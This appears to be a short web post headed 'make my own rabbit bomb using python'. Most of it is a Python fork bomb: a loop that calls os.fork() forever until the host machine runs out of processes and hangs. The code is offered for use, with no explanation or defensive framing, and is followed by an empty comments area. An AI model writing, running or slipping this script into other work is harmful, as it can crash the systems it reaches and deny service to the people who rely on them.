make my own rabbit bomb using python

35

#!/usr/bin/env python

    import os
    while True: os.fork()

Comments

Submit
0 Comments